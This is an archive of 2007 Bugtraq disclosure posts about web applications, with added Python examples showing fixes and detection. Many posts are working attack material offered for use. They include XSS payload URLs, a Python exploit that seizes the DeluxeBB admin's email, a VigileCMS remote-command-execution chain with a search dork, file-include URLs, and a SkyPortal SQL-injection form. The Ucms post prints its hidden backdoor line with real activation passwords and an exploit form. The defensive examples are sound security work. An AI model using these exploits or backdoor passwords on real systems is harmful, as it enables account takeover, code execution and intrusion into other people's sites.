Overview: OpenNewsletter is a free, simple, and beautiful
open source newsletter solution aimed at small to medium scale.

Attack:

Non-existent sanitization when parsing the PHP value 'type'
on 'compose.php' leads to some XSS attacks.

PoC:

http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E
http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E

Solution: not aware of at 12/6/2007.

Credits: Manu ([EMAIL PROTECTED])




This message was sent using IMP, the Internet Messaging Program.


DeluxeBB E-Mail Address Change Security Bypass

2007-11-26 Thread bugtraq
http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21


###


DeluxeBB E-Mail Address Change Security Bypass

Credits: Nexen

Application: DeluxeBB

Version: 1.09

Impact: Security Bypass

Risk: [3/5]


Exploit:

#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
 _ __   _____  _____ _ __
| '_ \ / _ \ \/ / _ \ '_ \
| | | |  __/>  <  __/ | | |
|_| |_|\___/_/\_\___|_| |_|


§ DeluxeBB 0day Remote Change Admin's credentials §

nexen

PoC / Bug Explanation:
When you update your profile,
DeluxeBB executes a vulnerable query:

$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail',
msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");

So, by editing the cookie membercookie you can change a remote user's email.

Enjoy ;)
'''

import httplib, urllib, sys, md5
from random import randint

print "\n"
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "
print " "
print " Vulnerability Discovered By Nexen "
print " Greetz to The:Paradox that Coded the Exploit. "
print " "
print " Usage: "
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])
print " "
print " Additional Flags: "
print " -id34 -passMypassword -port80 "
print " "
print " Example: "
print " python %s 127.0.0.1 admin /DeluxeBB/ [EMAIL PROTECTED] -port81 " % (sys.argv[0])
print " "
print "\n"

if len(sys.argv) <= 4: sys.exit()
else: print "[.]Exploit Starting."

target = sys.argv[1]
admin_nick = sys.argv[2]
path = sys.argv[3]
real_email = sys.argv[4]

botpass = "the-new-administrator"
rand = randint(1, 9)
dn1 = 0
dn2 = 0
dn3 = 0

# Parse the optional -id / -pass / -port flags.
try:
    for line in sys.argv[:]:
        if line.find('-pass') != -1 and dn1 == 0:
            upass = line.split('-pass')[1]
            dn1 = 1
        elif line.find('-pass') == -1 and dn1 == 0:
            upass = ""
        if line.find('-id') != -1 and dn2 == 0:
            userid = line.split('-id')[1]
            dn2 = 1
        elif line.find('-id') == -1 and dn2 == 0:
            userid = ""
        if line.find('-port') != -1 and dn3 == 0:
            port = int(line.split('-port')[1])
            dn3 = 1
        elif line.find('-port') == -1 and dn3 == 0:
            port = 80
except:
    sys.exit("[-]Some error in Additional Flag.")

if upass == "" and userid != "" or userid == "" and upass != "":
    print "[-]Bad Additional flags -id -pass given, ignoring them."
    upass = ""
    userid = ""

# Trying to connect.
try:
    conn = httplib.HTTPConnection(target, port)
    conn.request("GET", "")
except: sys.exit("[-]Cannot connect. Check Target.")

# Registering a new user if id or upass not defined.
try:
    conn = httplib.HTTPConnection(target, port)
    if upass == "" or userid == "":
        # The registration e-mail address is redacted in the archived post;
        # the original built it from rand like the user name.
        conn.request("POST", path + "misc.php?sub=register",
            urllib.urlencode({'submit': 'Register', 'name': 'th331337.%d' % (rand),
                              'pass': botpass, 'pass2': botpass,
                              'email': '[EMAIL PROTECTED]'}),
            {"Accept": "text/plain", "Content-type": "application/x-www-form-urlencoded"})
        response = conn.getresponse()
        cookies = response.getheader('set-cookie').split(";")
        #print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)
        print "[.]Registering a new user. -->", response.status, response.reason
        conn.close()
        # Getting memberid in Cookies.
        for line in cookies[:]:
            if line.find('memberid') != -1:
                mid = line.split('memberid=')[1]
        # Isset-like check.
        try: mid
        except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")
except AttributeError:
    sys.exit("[-]AttributeError Check your Target/path.")

# Doing some Md5.
if upass == "" or userid == "":
    hash = md5.new()
    hash.update(botpass)
    passmd5 = hash.hexdigest()
else:
    hash = md5.new()
    hash.update(upass)
    passmd5 = hash.hexdigest()
    mid = userid

# Updating victim email in Profile.
conn = httplib.HTTPConnection(target, port)
conn.request("POST", path + "cp.php?sub=settings", urllib.urlencode({'submit':
    'Update', 'xemail': real_email}), {"Accept": "text/plain", "Cookie":
    "memberid=" + mid + "; 

(The exploit listing is cut off at this point in the archived post.)
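
The query quoted in the bug explanation above, as an added example that is
not DeluxeBB's code: the profile update keyed on the client-supplied
membercookie, next to a version that takes the identity from the server-side
session and binds its values. The table and column names, the MD5 login
check and the session dict are assumptions made for the example; the exploit
listing above is cut short in the archive, so this reproduces the flaw
rather than the exploit.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture: the victim account and the throwaway account the
    exploit registers. Column names are assumed, not DeluxeBB's schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT, password_md5 TEXT)")
    for name, email, pw in [("admin", "admin@example.invalid", "hunter2"),
                            ("th331337", "bot@example.invalid", "the-new-administrator")]:
        db.execute("INSERT INTO users VALUES (?, ?, ?)",
                   (name, email, hashlib.md5(pw.encode()).hexdigest()))
    db.commit()
    return db


def login(db: sqlite3.Connection, username: str, password: str):
    """Server-side authentication: returns a session dict or None."""
    row = db.execute("SELECT password_md5 FROM users WHERE username=?", (username,)).fetchone()
    if row is None or row[0] != hashlib.md5(password.encode()).hexdigest():
        return None
    return {"user": username}


def update_email_vulnerable(db: sqlite3.Connection, cookies: dict, xemail: str) -> None:
    """DeluxeBB 1.09 as the post describes it: the row to update is chosen by
    the client-supplied membercookie and the values are interpolated into the
    SQL text. Any logged-in account (the exploit registers one only to obtain
    a valid memberid) can therefore pick the victim's row."""
    membercookie = cookies.get("membercookie", "")
    sql = "UPDATE users SET email='%s' WHERE (username='%s')" % (xemail, membercookie)
    db.execute(sql)
    db.commit()


def update_email_fixed(db: sqlite3.Connection, session: dict, xemail: str) -> None:
    """The target row comes from the identity the server established at login,
    never from request data, and the values are bound parameters, which also
    removes the quote-injection hazard of building the statement as a string."""
    db.execute("UPDATE users SET email=? WHERE username=?", (xemail, session["user"]))
    db.commit()


def email_of(db: sqlite3.Connection, username: str) -> str:
    return db.execute("SELECT email FROM users WHERE username=?", (username,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    update_email_vulnerable(db, {"memberid": "2", "membercookie": "admin"}, "attacker@example.invalid")
    print("admin e-mail after cookie-keyed update:", email_of(db, "admin"))
    db = make_db()
    update_email_fixed(db, login(db, "th331337", "the-new-administrator"), "attacker@example.invalid")
    print("admin e-mail after session-keyed update:", email_of(db, "admin"))
```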

VigileCMS = 1.8 Stealth Remote Command Execution Exploit

2007-11-22 Thread bugtraq
Opencosmo Security

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=15



VigileCMS <= 1.8 Stealth Remote Command Execution Exploit

Credits: The:Paradox

Application: VigileCMS

Version: 1.8

Impact: Remote Command Execution

Risk: [3/5]


Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ _ _

| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_ __

| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /

\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\

|_|



This is a Public Exploit. 22/10/2007 (dd-mm-)



§ 0day VigileCMS 1.8 Stealth and maybe lower version - Remote Command 
Execution §

Vendor: http://www.vigilenapoletano.it

Severity: Highest

Author: The:Paradox

Italy r0x.


Visit inj3ct-it.org


Comments: This exploit was coded to show some people what a real vulnerability 
is.



Related Codes:


--- index.php; line 64:

if (isset($_COOKIE["rem_user"]) and isset ($_COOKIE["rem_pass"]) and !isset($_SESSION["user"])) {
    if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){
        $_SESSION["user"] = $_COOKIE["rem_user"];
        $_SESSION["pass"] = $_COOKIE["rem_pass"];
        logthis("$_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!"); // "logged in to the site: recognised by cookie"
        UserVisita (); // update the user's visit counter in the database
    }
}

--- func.inc.php; line 93:

function is_admin(){ //## FUNCTION ##
    if( (isset($_SESSION["user"]) and isset($_SESSION["pass"])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){
        return true;
    } else {
        return false;
    }
}

--- func.inc.php; line 109:

function is_superadmin(){ //## FUNCTION ##
    include (LOGS_TAB."/creazione.php");
    if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION["user"]==$primo_amministra)) {
        return true;
    } else {
        return false;
    }
}

--- vedipm.php; line 210:

if ($_POST["ttl"] =="") $_POST["ttl"]="Nessun oggetto"; // "No subject"

$_POST["ttl"] =stripslashes($_POST["ttl"]);
$_POST["ttl"] =htmlspecialchars($_POST["ttl"]); // prevents rendering of HTML and malicious characters such as JavaScript
$_POST["cont"]=stripslashes($_POST["cont"]);
$_POST["cont"]=htmlspecialchars($_POST["cont"]); // prevents rendering of HTML and malicious characters such as JavaScript
$_POST["cont"]=str_replace("\r\n","[br]",$_POST["cont"]);
$_POST["cont"]=str_replace("~","|",$_POST["cont"]);
$_POST["ttl"]=str_replace("~","|",$_POST["ttl"]);

$time = time();

$newpm = fopen (PM_TAB."/$_POST[to]", "a");
fwrite ($newpm, "$_POST[ttl]~$_POST[cont]~$_SESSION[user]~$time~non_letto\r\n");
fclose($newpm);



Bug Explanation:

The platform has some vulnerabilities in the login system and in the
private message sending system.

The first vulnerability is in index.php, which verifies the login without an
SQL database by checking for the existence of files with the structure
Nick.HashMD5Password.php in a db directory.

The CMS coder didn't think about directory traversal. In fact, if we try to
log in with these cookies:

rem_user = /../users/Nick

rem_pass = HashMD5Password

where Nick and HashMD5Password are an existing username and the MD5 hash of
its password, we gain administration rights. This happens because the
function is_admin checks for the existence of the file
/db/admin/../users/Nick.HashMD5Password.php

Obviously this may work with any file (with some collateral errors because
an include is missing :P).

However, this doesn't let us do a lot in the control panel because we will
not have superadmin rights (see the is_superadmin() function).

The second vulnerability is in vedipm.php and lets us write a file on the
server, but we can't get RCE because our input is limited by
htmlspecialchars, which changes the characters of PHP code (< >). However,
$_SESSION[user] is not passed through htmlspecialchars.

Using the first and the second vulnerability together we can gain RCE. We
create a file whose name contains PHP code; with this we log in and get an
evil $_SESSION[user] that is then written into a PHP file.

A lot of other vulnerabilities have been found in this platform, but their
exploitability depends on MAGIC QUOTES being OFF or on other uses of the
vulnerabilities I explained, so they were not published.

Google Dork: "Powered by Cms Vigile"

Use this exploit at your own risk. You are responsible for your own deeds.

Not tested on versions lower than 1.6.
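
The traversal in the file-based credential check described above, as an
added example that is not VigileCMS code: the is_admin() lookup reproduced in
Python over a temporary db/ tree, next to a version that rejects the
traversal. The directory layout and file naming (db/users, db/admin,
Nick.HashMD5Password.php) follow the advisory; the nick and hash syntax
enforced by the fixed version, and the fixture contents, are my assumptions.

```python
import hashlib
import os
import re
import tempfile

NAME_RE = re.compile(r"^[A-Za-z0-9_-]+$")  # assumed policy for a valid nick
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def build_db_tree(root: str) -> str:
    """Constructed fixture mirroring the advisory: db/users holds
    Nick.HashMD5Password.php for an ordinary user, db/admin holds a file of
    the same shape for one administrator. Returns the shared MD5 hash."""
    pw_hash = hashlib.md5(b"secret").hexdigest()
    for sub, nick in (("users", "Nick"), ("admin", "Boss")):
        d = os.path.join(root, "db", sub)
        os.makedirs(d, exist_ok=True)
        open(os.path.join(d, "%s.%s.php" % (nick, pw_hash)), "w").close()
    return pw_hash


def make_fixture():
    """Fresh temporary tree plus the password hash used in it."""
    root = tempfile.mkdtemp()
    return root, build_db_tree(root)


def is_admin_vulnerable(root: str, user: str, pw_hash: str) -> bool:
    """file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php") as in
    func.inc.php: the user part is concatenated into the path unchecked, so
    user="/../users/Nick" tests db/admin//../users/Nick.<hash>.php, which is
    the ordinary user's file."""
    admin_tab = os.path.join(root, "db", "admin")
    return os.path.exists(admin_tab + "/%s.%s.php" % (user, pw_hash))


def is_admin_fixed(root: str, user: str, pw_hash: str) -> bool:
    """Same lookup, but the nick must be a bare name, the hash must look like
    an MD5, and the resolved path must still be a direct child of db/admin."""
    if not (NAME_RE.match(user) and MD5_RE.match(pw_hash)):
        return False
    admin_tab = os.path.realpath(os.path.join(root, "db", "admin"))
    candidate = os.path.realpath(os.path.join(admin_tab, "%s.%s.php" % (user, pw_hash)))
    if os.path.dirname(candidate) != admin_tab:
        return False
    return os.path.exists(candidate)


if __name__ == "__main__":
    root, h = make_fixture()
    print("vulnerable, traversal:", is_admin_vulnerable(root, "/../users/Nick", h))
    print("fixed, traversal:     ", is_admin_fixed(root, "/../users/Nick", h))
    print("fixed, real admin:    ", is_admin_fixed(root, "Boss", h))
```

The syntactic check alone would already stop this payload; the realpath
comparison is kept as the second line of defence for the case where the nick
rules are later relaxed or a symlink appears inside db/admin.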


TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities

2007-11-21 Thread bugtraq
Opencosmo Security

http://www.opencosmo.com


==

# TalkBack 2.2.7 Remote File Include Vulnerability


Software  : TalkBack version 2.2.7

Developer : http://www.scripts.oldguy.us/talkback

Discovered by : NoGe

Contact   : pace[dot]noge[at]hotmail[dot]com

  

==



# Vulnerable file

  

comments-display-tpl.php


line 35 include $language_file;

line 172 include $config['comments_form_tpl'];


addons/separate-comments-mod/my-comments-display-tpl.php


line 35 include $language_file;




# Exploit


http://localhost/path/comments-display-tpl.php?language_file=[evilcode]


http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]


http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]



==


# Greetz


all crew #papuahacker #baliemhackerlink #nyubicrew

skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie

yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke

http://kapukvalley.net member


==


Ucms <= 1.8 Backdoor Remote Command Execution Exploit

2007-11-21 Thread bugtraq
Opencosmo Security

http://www.opencosmo.com


##


html

!--

##

##

#  Ucms 1.4, 1.7, 1.8+?all   #

#Non Public exploit  #

#   by 2²hot²2 a.k.a D4m14n  #

#   and shadowleet   #

# Contact: [EMAIL PROTECTED]   #

# Or #

# [EMAIL PROTECTED]   #

##

Short description:

Ucms is a warez-cms coded by madmax,

he selled the cms for 150 Euro for one cms,

but it´s not enough that the cms costs 150 euro,

he added a secret backdoor which now is released...

Used by:

Famous warez-sites like alphawarez, loud, oxygen-warez and so on...

___


Backdoor in file:

/php/modules/entries/search.cache.inc.php

line 8:

$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash 
. '_info.dat';

if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ')[EMAIL 
PROTECTED](@stripslashes($_POST['e']));exit;};

the second string is hidden at the very right site with whitespaces in the 
texteditor, so nobody had seen it before,

the function is called in:

/php/modules/entries/search.main.inc.php

exploit:

--


head

titleUcms v. 1.8 Np exploit/title

script type=text/javascript

function sethost(seite)

{

document.host.action = seite + 'index.php?q=teste=1';

document.all.data.innerHTML =  document.host.action;

}

/script

/head

body onLoad=sethost('http://www.ucmspage.de/') 

h1Ucms v. 1.8 Np exploit/h1

Actual Request:div id=data/div

br /

Host:input type=text value=http://www.ucmspage.de/; 
onKeyUp=sethost(this.value); /

form id=host name=host action=http://www.ucmspage.de/; method=POST

Password:input type=text name=p value=ZCShY8FjtEhIF8LZbr /

!--

Additional info:

You need a password to activate the backdoor we found these passwords:

ZCShY8FjtEhIF8LZ (UCMS 1.8)

mYM1NHtWtZk2KwrF (UCMS 1.4)

wVCQUyhTga5Nmft1 (UCMS [?])

Just go into the file or similar files to find the passwords,

 for every version there is another password

--

 

Phpcode:br /

textarea name=e rows=20 cols=100

phpinfo(); ?

/textarea

br /

input type=submit value=exploit

/form

/body


!--

It´s just a crime to do such thigs, so please use

this exploit just for knowledge and not to destroy the warez pages...

thank you for you attention...

Have a nice day

--


/html
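Added example, not from the post and not Ucms code: a scanner for the hiding trick described above, where the backdoor sits on line 8 after enough whitespace to fall off the right edge of an editor. It flags lines in which request-handling or code-execution tokens follow a long run of whitespace; the sample PHP file, its placeholder password and the `MIN_GAP` threshold are constructed for the demonstration.

```python
"""Flag PHP source lines that hide code behind a long run of whitespace.

Audit helper (constructed for this example).  A line that looks like
ordinary code but carries more code after 40+ spaces is reported together
with the hidden tail, so an administrator can review it without opening
every file in an editor with horizontal scrolling.
"""
import re
import sys

# A "gap" is a run of whitespace long enough to push the rest off-screen.
MIN_GAP = 40

# Tokens that are suspicious when they appear after a gap: request input,
# code execution, or the decoding helpers typically used for obfuscation.
SUSPICIOUS = re.compile(
    r"\$_(POST|GET|REQUEST|COOKIE)\b|\b(eval|assert|system|passthru|"
    r"shell_exec|base64_decode|gzinflate|create_function)\s*\(",
    re.IGNORECASE,
)

# Non-space, then the gap, then the hidden tail up to end of line.
GAP = re.compile(r"\S(?P<gap>[ \t]{%d,})(?P<tail>\S.*)$" % MIN_GAP)


def find_hidden_code(source: str):
    """Return (line_no, hidden_tail) for every line that hides suspicious code."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        m = GAP.search(line.rstrip("\r\n"))
        if m and SUSPICIOUS.search(m.group("tail")):
            hits.append((line_no, m.group("tail")))
    return hits


def scan_files(paths):
    """Scan each path and return {path: hits}; unreadable files are skipped."""
    report = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[path] = find_hidden_code(fh.read())
        except OSError:
            continue
    return report


# Constructed sample: line 3 mimics the layout described in the post
# (normal code, a wide gap, then a password check on $_POST), with a
# placeholder password instead of a real one.  Line 4 has a wide gap that
# only precedes a comment and must not be flagged.
SAMPLE_PHP = (
    "<?php\n"
    "$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash\n"
    "    . '_info.dat';" + " " * 120
    + "if(@stripslashes($_POST['p']) == 'PLACEHOLDER_PASSWORD'){ /* hidden code */ exit; }\n"
    "$x = str_pad('a', 50);" + " " * 60 + "// aligned comment\n"
)


if __name__ == "__main__":
    targets = scan_files(sys.argv[1:]) if len(sys.argv) > 1 else {"<sample>": find_hidden_code(SAMPLE_PHP)}
    for path, hits in targets.items():
        for line_no, tail in hits:
            print(f"{path}:{line_no}: hidden after whitespace: {tail[:80]}")
```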


SkyPortal vRC6 Multiple Remote Vulnerabilities

2007-11-21 Thread bugtraq
Opencosmo Security

www.opencosmo.com


## WwW.BugReport.ir 
###

#

#  BugReport Security Research  Penetration Testing Group

#

# Title: [Sky Portal] Multiple SQL Injection Vulnerabilities

# Vendor: http://skyportal.net

# Exploitation: Remote with browser

# Fix Available: Patched In Last Version In Vendor

###

# Leaders : Shahin Ramezany  Sorush Dalili

# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi

# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com

# Country: Iran

# Contact : [EMAIL PROTECTED]

 Bug Description ###


Description:



A lot of SQL injections were found and we exploited one of them.

A registered user can change his/her name and read all others' private messages.


Vulnerabilities:



+-- Multiple SQL Injection Vulnerabilities


nc_top.asp Line 59 

strDBNTFUserName = an injection can be performed into the function at line 60, i.e. isMbr() 
 (test.htm), but !??! this function is very crazy!

--

user can delete all bookmarks

inc_bookmarks.asp line 179

delSQL = DELETE FROM  strTablePrefix  BOOKMARKS WHERE BOOKMARK_ID =   
delBkmk(ib)


this file is used from cp_main.asp

---


inc_profile_functions.asp

line 568,570,572,573


---


user can delete all SUBSCRIPTIONS

inc_SUBSCRIPTIONS.asp line 163

delSQL = DELETE FROM  strTablePrefix  SUBSCRIPTIONS WHERE SUBSCRIPTION_ID 
=   delBkmk(ib)

executeThis(delSQL)

this file is used from cp_main.asp



-- Html Exploit --


<form action="http://[VICTIM URL]/cp_main.asp?mode=EditIt&cmd=9" method="post">

Photo_URL: <input type="text" name="Photo_URL" value="" size="200" />

<br />

Avatar_URL[injection goes here]: <input type="text" name="Avatar_URL" 
value="',M_Name='Admin',M_Username='Admin" />

<br />

LINK1[Also injection goes here]: <input type="text" name="LINK1" value="" />

<br />

LINK2[Also injection goes here]: <input type="text" name="LINK2" value="" />

<br />

Password: <input type="text" name="Password-d" value="YOU MUST ENTER YOUR 
HASHED PASSWORD HERE (For Ex: 123123 = defbfbd84d16387273dde914fd309c3b)" />

<br />

Email: <input type="text" name="Email" value="[EMAIL PROTECTED]" />

<br />

Name: <input type="text" name="Name" value="Your Current Username" />

<br />

RECMAIL: <input type="text" name="RECMAIL" value="0" />

<br />

HideMail: <input type="text" name="HideMail" value="1" />

<br />

<br />

<input type="submit" />

</form>


Credit:



BugReport Security Research  Penetration Testing Group

WwW.BugReport.ir
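Added example, not SkyPortal code: the advisory quotes inc_bookmarks.asp building its DELETE by pasting the request value into the SQL text, which is why one user can delete every bookmark. This Python/sqlite3 model (constructed table and rows) reproduces that effect and shows the usual fix, binding the id as a parameter and scoping the DELETE to the requesting member's own rows.

```python
"""Concatenated versus parameterised bookmark deletion (constructed model)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: two members, three bookmarks between them."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE FORUM_BOOKMARKS (BOOKMARK_ID INTEGER, MEMBER_ID INTEGER, URL TEXT)"
    )
    con.executemany(
        "INSERT INTO FORUM_BOOKMARKS VALUES (?, ?, ?)",
        [
            (1, 10, "/topic.asp?TOPIC_ID=5"),
            (2, 10, "/topic.asp?TOPIC_ID=9"),
            (3, 20, "/topic.asp?TOPIC_ID=7"),
        ],
    )
    return con


def delete_bookmark_vulnerable(con: sqlite3.Connection, bookmark_id: str) -> int:
    """Mirrors the quoted ASP: the request value becomes part of the SQL text.

    Returns the number of rows removed.  A value such as "1 OR 1=1" turns the
    WHERE clause into a tautology and empties the table for every member.
    """
    sql = "DELETE FROM FORUM_BOOKMARKS WHERE BOOKMARK_ID = " + bookmark_id
    return con.execute(sql).rowcount


def delete_bookmark_fixed(con: sqlite3.Connection, member_id: int, bookmark_id: str) -> int:
    """Hardened form: validate the id, bind it, and scope to the caller's rows.

    Two separate controls apply here.  The parameter binding stops the value
    from changing the query's structure, and the MEMBER_ID predicate stops a
    member from deleting another member's bookmark even with a valid id.
    """
    try:
        bid = int(bookmark_id)
    except ValueError:
        return 0  # not an id at all; reject instead of guessing
    return con.execute(
        "DELETE FROM FORUM_BOOKMARKS WHERE BOOKMARK_ID = ? AND MEMBER_ID = ?",
        (bid, member_id),
    ).rowcount


def remaining(con: sqlite3.Connection) -> int:
    """Rows left in the table, used to show the blast radius of each path."""
    return con.execute("SELECT COUNT(*) FROM FORUM_BOOKMARKS").fetchone()[0]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, injected id:", delete_bookmark_vulnerable(con, "1 OR 1=1"),
          "deleted, remaining", remaining(con))
    con = make_db()
    print("fixed, injected id:", delete_bookmark_fixed(con, 10, "1 OR 1=1"),
          "deleted; someone else's id:", delete_bookmark_fixed(con, 10, "3"),
          "deleted; own id:", delete_bookmark_fixed(con, 10, "1"),
          "deleted, remaining", remaining(con))
```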


CVE-2007-4600 - Mathcad Protect Worksheet Vulnerability

2007-10-16 Thread bugtraq
Mathcad Security Vulnerability Briefing - CVE-2007-4600



Synopsis of Vulnerability

==

The ‘Protect Worksheet’ functionality, used to protect sections of Mathcad sheets 
from alteration, in versions 12 through 14 is easily bypassed, allowing access 
to the protected data due to the implementation of the file format used to save 
the files. 



Background on Mathcad

==

Mathcad (http://www.ptc.com/appserver/mkt/products/home.jsp?k=3901) is used to 
perform, document and share calculation and design work. The unique Mathcad 
visual format and scratchpad interface integrate standard mathematical 
notation, text and graphs in a single worksheet - making Mathcad ideal for 
knowledge capture, calculation reuse, and engineering collaboration.



Vulnerable Software Versions

=

Mathsoft, Mathcad 12 

Mathsoft, Mathcad 13

Mathsoft, Mathcad 13.1

PTC,  Mathcad 14


Running on Microsoft, Windows 2000, Service Pack 4

Running on Microsoft, Windows XP, Service Pack 2



Impact

===

Access Vector:  Locally exploitable.

Access Complexity:  Low.

Authentication: Not required to exploit.

Impact type:Provides unauthorised access. Allows partial 
confidentiality, integrity, and availability violation. Allows unauthorised 
disclosure of information.



Description of Vulnerability

=

According to Mathcad’s online help: 


‘When distributing worksheets, you may wish to restrict user access to most 
regions. Rather than locking an area, you may opt instead to use worksheet 
protection.

The intent of file protection is to prevent other users from opening the 
worksheet in a text editor and editing its contents by hand. The allowed file 
formats are either binary (XMCDZ, MCD) or output-only (RTF, HTML). With file 
protection enabled, you can only alter the contents of a worksheet from 
Mathcad. You can create, edit, and delete regions within the worksheet with no 
restrictions.’




The XMCDZ file format is not a true binary format. It is the standard Mathcad 
.XMCD XML sheet, which has been GZIPPED. For this reason it is a simple matter 
to get the original plain text XML sheet out of the file, using an archive 
utility.


Once the XML file has been extracted, within the editor tag there will be a 
protection tag. This will look like: 

protection protection-level=low password=XZEdIlJPXZxa1CQRKn6Sfw==/ 


There are 2 components to this tag: the level of restrictions placed upon the 
sheet and also an optional password needed for un-protecting the sheet. 


There are 3 protection-level settings, high, medium and low. These correspond 
to Editing, Content and File protection, respectively. For example if a sheet 
was saved with Editing protection enabled, then the protection tag would have 
a high protection level. This can easily be changed with a text editor before 
the sheet is reopened in Mathcad.


The password is hashed, however the same hash is always produced for a given 
string. For example XZEdIlJPXZxa1CQRKn6Sfw== represents the string 
password, and could be used in any sheet. 


Due to these limitations the entire protection tag could be removed, the 
level of protection could be reduced, or the password could be changed. 


The MCD format is a proprietary binary type format. It was used in older 
versions of the application, before the XML format became the standard. However 
if this format is selected from a newer version of the application, a warning 
is generated stating that ‘If your worksheet is saved as a Mathcad 11 file, 
some features and calculations may not be preserved’. Selecting either Mathcad 
11 or Mathcad 12 MCD file formats produces a warning about potential loss of 
functionality.


The sheets do include an MD5 hash, however this is only used internally by the 
application to determine if the sheet has been changed outside of Mathcad and 
the equations require recalculating. Changing the protection tag in the XML 
file will not be detected by the application, and no exceptions will be raised.



Workaround

===

None.



Proof of Concept

=

None required.
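Added example, not part of the briefing and not PTC code: a reader that opens an XMCDZ file the way the text describes (gzip around XMCD XML), locates the protection element and reports the level, its meaning and whether the password attribute is the published hash of the word "password". The element layout of the constructed sample follows only what the briefing states (a protection element inside the editor element); real worksheets carry much more.

```python
"""Report what protection an XMCDZ worksheet actually carries (constructed)."""
import gzip
import io
import xml.etree.ElementTree as ET
from typing import Optional

# Mapping given in the briefing: attribute value -> Mathcad protection mode.
LEVELS = {"high": "Editing", "medium": "Content", "low": "File"}

# Hash quoted in the briefing as the deterministic hash of the string "password".
KNOWN_HASH_OF_PASSWORD = "XZEdIlJPXZxa1CQRKn6Sfw=="


def build_sample_xmcdz(level: str, password_hash: Optional[str]) -> bytes:
    """Constructed stand-in for a saved worksheet: minimal XML, gzip-compressed."""
    pw = f' password="{password_hash}"' if password_hash else ""
    xml = (
        '<?xml version="1.0" encoding="utf-8"?>'
        "<worksheet><editor>"
        f'<protection protection-level="{level}"{pw}/>'
        "</editor><regions/></worksheet>"
    )
    return gzip.compress(xml.encode("utf-8"))


def inspect_protection(xmcdz: bytes) -> dict:
    """Decompress, parse, and describe the first protection element found.

    The result says what the file claims.  Because the briefing shows that the
    attribute can be edited freely and the embedded MD5 does not cover it, the
    claim is informational only and must not be treated as enforcement.
    """
    with gzip.GzipFile(fileobj=io.BytesIO(xmcdz)) as gz:
        root = ET.fromstring(gz.read())
    for elem in root.iter():
        # Compare on the local name so a namespaced document is handled too.
        if elem.tag.rsplit("}", 1)[-1] == "protection":
            level = elem.get("protection-level", "none")
            pw_hash = elem.get("password")
            return {
                "level": level,
                "meaning": LEVELS.get(level, "unknown"),
                "password_set": pw_hash is not None,
                "known_weak_password": pw_hash == KNOWN_HASH_OF_PASSWORD,
            }
    return {"level": "none", "meaning": "unprotected",
            "password_set": False, "known_weak_password": False}


if __name__ == "__main__":
    sample = build_sample_xmcdz("high", KNOWN_HASH_OF_PASSWORD)
    print(inspect_protection(sample))
```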


Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-21 Thread bugtraq
Can we close this thread now?

http://en.wikipedia.org/wiki/Zero_day

A zero-day (or zero-hour) attack is a computer threat that exposes undisclosed 
or unpatched computer application vulnerabilities. Zero-day attacks take 
advantage of computer security holes for which no solution is currently 
available.


 Steven Adair wrote:
  Not in my book.  I guess the people on this list are working off too many
  different definitions of 0day.  0day to me is something for which there is
  no patch/update at the time of the exploit being coded/used.  So if I code
  an exploit for IE right now and they don't patch it until April September
  2008, it's a 0day exploit for a year.  It's not necessarily new and it
  doesn't have to be used maliciously.
  
  If I code an exploit (for which there is no patch) and use it on my own
  servers, does that mean it's not 0day?  I don't think so.  If my WordPress
  blog gets owned by pwnpress, that's not 0day.. there's patches/updates for
  everything on there.  It just makes me an idiot for not upgrading.  Now if
  I get hit with some WP exploit that's not patched, then that's another
  [0-day] story.
  
  Steven
  securityzone.org
  
 
 If you're going to steal a term from the biological community at least 
 use in in the same context.  The biological metaphor is getting 
 stretched so much that people forget that these terms have meaning 
 outside the IT realm.
 
 -- 
 Wayne D. Hoxsie Jr.
 
- Robert
http://www.cgisecurity.com/



